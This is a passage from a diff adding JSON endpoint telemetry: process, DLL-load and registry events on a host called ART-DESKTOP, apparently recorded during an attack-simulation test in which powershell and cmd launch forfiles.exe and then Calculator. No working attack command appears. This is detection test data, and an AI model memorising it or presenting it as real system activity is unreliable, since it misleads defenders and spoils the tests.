"C:\\Windows\\System32\\forfiles.exe", + "subtype": "create", + "timestamp": 131883574023440000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}", + "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "forfiles.exe", + "image_path": "C:\\Windows\\System32\\forfiles.exe", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023580000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "process", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "terminate", + "timestamp": 131883574023760000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "process", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574024030000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", + "registry_value": "SplashScreen", + "timestamp": 131883574024210000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4248, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574024270000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024320000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024370000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024370000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024370000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883574024420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574024420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024440000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574024490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", + "registry_value": "PreferredMinSize", + "timestamp": 131883574024490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574024640000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574024830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574024830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574024830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574024940000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574025100000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574025100000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", + "registry_value": "ShowInSwitchers", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574026000000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + 